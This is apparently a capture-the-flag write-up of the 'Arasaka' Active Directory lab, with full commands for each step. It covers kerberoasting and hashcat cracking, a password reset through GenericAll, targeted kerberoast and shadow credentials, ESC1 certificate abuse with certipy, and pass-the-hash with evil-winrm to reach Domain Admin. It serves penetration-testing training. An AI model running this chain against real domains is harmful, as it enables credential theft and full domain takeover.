Arasaka

Challenge Lab (Easy) - by Henry Lever

The following post by 0xb0b is licensed under CC BY 4.0


Scenario

Starting Credentials

faraday:hacksmarter123

Objective and Scope

You are a member of the Hack Smarter Red Team. This penetration test will operate under an assumed breach scenario, starting with valid credentials for a standard domain user, faraday.

The primary goal is to simulate a realistic attack, identifying and exploiting vulnerabilities to escalate privileges from a standard user to a Domain Administrator.

Recon

Rustscan

We use rustscan with a batch size set of 500 to quickly scan all ports on 10.1.8.188. The results are then passed to Nmap, which runs a TCP connect scan -sT, service/version detection -sV, default scripts -sC, and treats the host as online without pinging -Pn.

A batch size of 500 trades speed for stability, the default (1500) balances both, while 10000 maximizes speed but risks instability and missed results.

Our RustScan of 10.1.8.188 identified a Windows domain controller named DC01.hacksmarter.local in the hacksmarter.local domain, with a certificate authority (CA) hacksmarter-DC01-CA. Exposed services include DNS 53, Kerberos 88/464, multiple MSRPC endpoints 135, 593, 49664+, SMB 139/445, LDAP and LDAPS 389/636/3268/3269 tied to Active Directory, RDP 3389, WinRM 5985, and .NET Remoting 9389. This indicates a fully integrated Windows AD environment where LDAP/LDAPS and Kerberos provide authentication, SMB and RPC enable remote management, and RDP/WinRM serve as remote access points.

rustscan -b 500 -a 10.1.8.188 -- -sT -sV -sC -Pn

The following screenshots show the excerpts of the service and default script scan.

Output service and default script scan for ports 53,88,135,139,389:

Output service and default script scan for ports 445,464,593,636:

Output service and default script scan for port 3268:

Output service and default script scan for port 3269:

Output service and default script scan for port 3389:

Output service and default script scan for ports 5985,9389,49xxx+,53xxx+:

We add the following to our /etc/hosts file:

DC01.hacksmarter.local
hacksmarter.local
hacksmarter-DC01-CA

BloodHound

From our initial Nmap scan, we determined that the machine is a domain controller. We are testing whether we can authenticate using LDAP with the credentials provided. We are using NetExec for this purpose.

faraday:hacksmarter123

We see that we have access as faraday.

nxc ldap hacksmarter.local -u faraday -p hacksmarter123

Collection

We are using bloodhound-ce.py to enumerate Active Directory objects and relationships using the given credentials within the hacksmarter.local domain.

bloodhound-ce.py --zip -c All -d hacksmarter.local -u faraday -p 'hacksmarter123' -dc DC01.hacksmarter.local -ns 10.1.8.188

Workaround

In case you face an issue with DNS, you can use dnschef.py to fake DNS responses.

With the following DNSchef setup every hostname queried through the DNS server resolve to 10.1.8.188 and suppresses most logging messages.

dnschef.py --fakeip 10.1.8.188 -q

With setting the nameserver to localhost the DNS queries are processed by DNSChef. Now nothing should stand in the way of execution.

bloodhound-ce.py --zip -c All -d hacksmarter.local -u faraday -p 'hacksmarter123' -dc DC01.hacksmarter.local -ns 127.0.0.1

Ingestion

Next, we start Bloodhound Community Edition.

bloodhound-ce

We can reach Bloodhound at http://localhost:1030/. Next, we ingest the collected Data and analyze possible attack paths.

http://localhost:1030/

Analysis

We mark the user faraday as owned and inspect the memberships of the user. Nothing out of the ordinary here.

We look for Domain Admins and spot the Administrator and the_emperor.

Now we look for some low hanging fruits: possible kerberoastable users. The user alt.svc is actually kerberoastable.

Kerberoasting is an attack technique where service tickets (TGS) for service accounts in Active Directory are requested and then cracked offline to recover the service account passwords.

Furthermore we take a closer look at alt.svc's Outbound Object Control and see that the user has GenericAll permission to yorinobu.Which essentially allows us to change the password of that user. Our attack path is slowly taking shape.

Let's assume we could obtain the credentials from alt.svc through cracking the TGS blob. For now we mark the user as owned to check the shortes path from owned objects.

We see we could then access Yorinobu via GenericAll and obtain access from yorinobu via GenericWrite as soulkiller.svc. After that it doesn’t go any further, the user soulkiller.svc has no additional permissions. A small hint beforehand: We haven't looked for flawed certificates yet.

A helpful tool for finding your way around and getting an overview of everything you could do can be found in the Orange Cyberdefense mind map as a supplementary resource.

Access as alt.svc

We continue and attempt to use Kerberosting to access the service ticket of alt.svc via faraday.

For this purpose we use NetExec. A detailed explanation and alternative tools are described in the following article:

We run the following command and are able to retrieve the TGS blob from alt.svc. The blob is saved to output.txt.

nxc ldap hacksmarter.local -u faraday -p hacksmarter123 --kerberoasting output.txt

Next, we crack the blob using hashcat with mode -m13100. To find the correct mode we can use the following resource: https://hashcat.net/wiki/doku.php?id=example_hashes

With the current newest release hashcat 7.0.0 the hash-mode gets automatically detetected. See https://www.hackthebox.com/blog/hashcat-7-release-top-new-features

We are able to crack the blob and get the password of alt.svc.

hashcat -m13100 -a0 output.txt /usr/share/wordlist/rockyou.txt

We test the credentials using NetExec. We successfully authenticated. We move on.

nxc ldap hacksmarter.local -u alt.svc -p REDACTED 

Access as yorinobu

From our Bloodhound analysis we know that alt.svc has a GenericAll relationship to yorinobu. This allows us to change the password of the user. The following resource showcases the different tools we could use to change the password of the user.

We will be using bloodyAD.

Next, with the following command we change the password for yorinobu to newP@ssword2022.

bloodyAD --host "10.1.8.188" -d "DC01.hacksmarter.local" -u "alt.svc" -p "REDACTED" set password "yorinobu" "newP@ssword2022"

We test the credentials using NetExec. We successfully authenticated. We move on.

nxc ldap hacksmarter.local -u yorinobu -p newP@ssword2022 

Access as soulkiller.svc

From our Bloodhound analysis we know that yorinobu has a GenericWrite relationship to soulkiller.svc. This allows either a TargetedKerberoast or Shadow Credentials Atttack.

With the GenericWrite permission we are able to modify soulkiller.svc's servicePrincipalName (SPN), we request a service ticket for it, and perform offline Kerberos ticket cracking to recover its password.

In a Shadow Credentials Attack we abuse the GenericWrite permission to add a malicious key credential to soulkiller.svc, allowing authentication as that account without knowing its password.

We will show both options.

TargetedKerberoast

We'll start with the TargetedKerberoast. See below links for further reading:

To perform the TargetedKerberoast we will use the following tool:

We run the following command and are able to get the Kerberos 5, etype 23, TGS-REP blob of the soulkiller.svc user.

targetedKerberoast.py -v -d "hacksmarter.local" -u "yorinobu" -p "newP@ssword2022" -o Kerberoastables.txt

We use hashcat again to crack the blob and are able to retrieve the password of soulkiller.svc.

hashcat -m13100 -a0 Kerberoastables.txt /usr/share/wordlists/rockyou.txt

We test the credentials using NetExec. We successfully authenticated. We could now move on, or try the Shadow Credentials Attack.

nxc ldap hacksmarter.local -u soulkiller.svc -p 'REDACTED'

Shadow Credentials Attack

The following Section descirbes the Shadow Credentials Attack and can be skipped.

Further information on the Shadow Credentials Attack can be found under the following link:

To perform the Shadow Credentials Attack we are using Certipy.

In short: If we can write to the msDS-KeyCredentialLink property of a user, we can retrieve the NT hash of that user.

With the following command we issue the attack and are succesful. We retrieve the NT hash of soulkiller.svc.

certipy shadow auto -u 'yorinobu@hacksmarter.local' -p 'newP@ssword2022' -account 'soulkiller.svc' -dc-ip 10.1.8.188

We test the credentials using NetExec. We successfully authenticated. We could now move on.

nxc ldap hacksmarter.local -u soulkiller.svc -H 'REDACTED'

Shell as the_emperor

As already mentioned, we seem to have reached a dead end. But we haven't checked for poorly configured certificates yet.

In addition to using BloodHound to enumerate objects and relationships within Active Directory, there are also tools specifically designed for enumerating certificate-related vulnerabilities. Notable examples include Certipy and SpecterOps' research, which help identify vulnerable certificate templates that can be exploited for privilege escalation.

We use Certipy to search for faulty certificates that allow privilege escalation. Maybe there are some, and maybe soulkiller.svc can enroll them.

We are issuing the following command and receive a json output with the results. The certificate templates AI_Takeover is misconfigured to allow any authenticated user to enroll and supply arbitrary subject names, enabling ESC1 attacks for impersonation via client authentication.

certipy find -u soulkiller.svc@hacksmarter.local -hashes ':REDACTED' -dc-ip 10.1.8.188 -vulnerable

Our free Exegol container still uses the old version v4.8.2. The current version is 5.0.4 covering all known ESC1-ESC16 attack paths.

We inspect the JSON and a Certificate Template called AI_Takeover vulnerable to ESC1 could be identified.

certipy.json
{
  "Certificate Authorities": {
    "0": {
      "CA Name": "hacksmarter-DC01-CA",
      "DNS Name": "DC01.hacksmarter.local",
      "Certificate Subject": "CN=hacksmarter-DC01-CA, DC=hacksmarter, DC=local",
      "Certificate Serial Number": "1DBC9F9ECF287FB04FDE66106578611F",
      "Certificate Validity Start": "2025-09-21 15:32:14+00:00",
      "Certificate Validity End": "2030-09-21 15:42:14+00:00",
      "Web Enrollment": "Disabled",
      "User Specified SAN": "Disabled",
      "Request Disposition": "Issue",
      "Enforce Encryption for Requests": "Enabled",
      "Permissions": {
        "Owner": "HACKSMARTER.LOCAL\\Administrators",
        "Access Rights": {
          "2": [
            "HACKSMARTER.LOCAL\\Administrators",
            "HACKSMARTER.LOCAL\\Domain Admins",
            "HACKSMARTER.LOCAL\\Enterprise Admins"
          ],
          "1": [
            "HACKSMARTER.LOCAL\\Administrators",
            "HACKSMARTER.LOCAL\\Domain Admins",
            "HACKSMARTER.LOCAL\\Enterprise Admins"
          ],
          "512": [
            "HACKSMARTER.LOCAL\\Authenticated Users"
          ]
        }
      }
    }
  },
  "Certificate Templates": {
    "0": {
      "Template Name": "AI_Takeover",
      "Display Name": "AI_Takeover",
      "Certificate Authorities": [
        "hacksmarter-DC01-CA"
      ],
      "Enabled": true,
      "Client Authentication": true,
      "Enrollment Agent": false,
      "Any Purpose": false,
      "Enrollee Supplies Subject": true,
      "Certificate Name Flag": [
        "EnrolleeSuppliesSubject"
      ],
      "Enrollment Flag": [
        "PublishToDs",
        "IncludeSymmetricAlgorithms"
      ],
      "Private Key Flag": [
        "ExportableKey"
      ],
      "Extended Key Usage": [
        "Client Authentication",
        "Secure Email",
        "Encrypting File System"
      ],
      "Requires Manager Approval": false,
      "Requires Key Archival": false,
      "Authorized Signatures Required": 0,
      "Validity Period": "1 year",
      "Renewal Period": "6 weeks",
      "Minimum RSA Key Length": 2048,
      "Permissions": {
        "Enrollment Permissions": {
          "Enrollment Rights": [
            "HACKSMARTER.LOCAL\\Soulkiller.svc",
            "HACKSMARTER.LOCAL\\Domain Admins",
            "HACKSMARTER.LOCAL\\Enterprise Admins"
          ]
        },
        "Object Control Permissions": {
          "Owner": "HACKSMARTER.LOCAL\\Administrator",
          "Write Owner Principals": [
            "HACKSMARTER.LOCAL\\Domain Admins",
            "HACKSMARTER.LOCAL\\Enterprise Admins",
            "HACKSMARTER.LOCAL\\Administrator"
          ],
          "Write Dacl Principals": [
            "HACKSMARTER.LOCAL\\Domain Admins",
            "HACKSMARTER.LOCAL\\Enterprise Admins",
            "HACKSMARTER.LOCAL\\Administrator"
          ],
          "Write Property Principals": [
            "HACKSMARTER.LOCAL\\Domain Admins",
            "HACKSMARTER.LOCAL\\Enterprise Admins",
            "HACKSMARTER.LOCAL\\Administrator"
          ]
        }
      },
      "[!] Vulnerabilities": {
        "ESC1": "'HACKSMARTER.LOCAL\\\\Soulkiller.svc' can enroll, enrollee supplies subject and template allows client authentication"
      }
    }
  }
}

The Certificate:

The classfication of the vulnerabilty:

A detailed explanation of the misconfiguration and how it can be exploited can be found at the following link:

In short the ESC1 Enterprise Security Control 1 is an AD CS (Active Directory Certificate Services) misconfiguration where the CA is configured to allow any authenticated user to request certificates based on a template that permits Client Authentication and allows the requester to supply arbitrary Subject Alternative Names (SANs). This enables us to impersonate other users, including domain admins, by obtaining valid certificates

From our initial BloodHound Analysis w know that the user the_emperor is a domain admin. We will target this user.

We request a certificate as soulkiller.svc, specify the Certificate Authority hacksmarter-DC01-CA, the domain hacksmarter.local and the vulnerable certificate template AI_Takeovere. Furthermore, the upn the_emperor@hacksmarter.local to impersonate this identity. We receive a .pfx file.

certipy req -username soulkiller.svc  -hashes ':REDACTED' -ca hacksmarter-DC01-CA -target hacksmarter.local -template AI_Takeover -upn THE_EMPEROR@hacksmarter.local -dns 10.1.8.188 -debug

Next, we authenticate as the_emperor using the certificate. This will give us the NT hash.

certipy auth -pfx the_emperor_10.pfx -dc-ip 10.1.8.188

We can pass the hash in evil-winrm and get a session. We are the domain admin the_emperor .

evil-winrm -i hacksmarter.local -u the_emperor -H 'REDACTED'

We'll find the root flag at C:\Users\Administrator\Desktop\root.txt.

Last updated

Was this helpful?